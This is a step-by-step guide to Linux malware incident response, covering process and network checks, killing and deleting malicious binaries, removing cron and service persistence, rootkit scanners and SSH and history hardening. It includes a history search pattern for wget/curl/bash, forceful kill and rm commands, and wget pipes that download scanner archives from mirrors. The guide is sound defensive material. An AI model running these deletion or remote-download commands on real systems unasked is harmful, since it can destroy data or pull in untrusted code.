Master Linux Incident Response: Step-by-Step Malware Detection and Removal

Overview

Linux incident response lacks built‑in GUI tools; a practical workflow consists of four stages: Identify, Remove, Close Loop (persistence removal), and Harden. The following sections describe typical indicators and concrete shell commands for each stage.

Identify Symptoms

CPU usage

List processes sorted by CPU usage: top -b -o +%CPU Processes consuming >70 % CPU with suspicious names are often cryptominers.

Process enumeration

Show all processes with full command lines: ps -aux Look for unusual arguments such as URLs, which indicate downloader behavior.

Security‑gateway alerts

Monitor network connections to known malicious IPs:

while true; do netstat -antp | grep <em>malicious_ip</em>; sleep 5; done

If the alert contains a domain whose IP changes, add a temporary entry to /etc/hosts that redirects the domain to an unused IP, then monitor that IP with the same loop.

Command history

Search the shell history for suspicious commands:

history | grep -iE 'wget|curl|bash|sh'

Remove Malware

Terminate the malicious process

ps -elf | grep <em>pid_or_name</em>
kill -9 <em>pid</em>

Delete the executable

ls -al /proc/<em>pid</em>/exe   # verify the binary path
rm -f <em>/path/to/binary</em>

Close Loop (Persistence Removal)

Cron jobs

List user crontabs and system‑wide schedules:

crontab -l
cat /etc/crontab
cat /etc/anacrontab

Services

service --status-all | grep -i <em>suspicious</em>

Modified system binaries

Find binaries that were changed in the last week (adjust the time window as needed):

find /usr/bin /usr/sbin /bin /usr/local/bin -type f -mtime -7 -exec ls -la {} \;

Rootkits

Install and run common rootkit scanners:

# chkrootkit
wget -qO- https://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz | tar zx
cd chkrootkit-0.52
make sense
./chkrootkit

# rkhunter
wget -qO- https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz | tar zx
cd rkhunter-1.4.4
./installer.sh --install
rkhunter -c

System Hardening

SSH hardening

Identify successful and failed login attempts:

grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}'
grep "Failed password" /var/log/secure | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq -c

Command auditing

Increase history size and record timestamps with source IP:

sed -i 's/^HISTSIZE=.*/HISTSIZE=10000/' /etc/profile

USER_IP=$(who -u am i 2>/dev/null | awk '{print $NF}' | tr -d '()')
[ -z "$USER_IP" ] && USER_IP=$(hostname)

export HISTTIMEFORMAT="%F %T $USER_IP $(whoami) "
shopt -s histappend
export PROMPT_COMMAND="history -a"
source /etc/profile

Web application patches

Apply updates for known vulnerable components (e.g., structs2, ThinkPHP, Redis, Confluence, Drupal) to close the most common infection vectors.

Conclusion

Linux infections are dominated by botnet worms and cryptominers that exploit exposed services and unpatched web applications. Regular patching, strong authentication, and the above response workflow reduce the risk of compromise.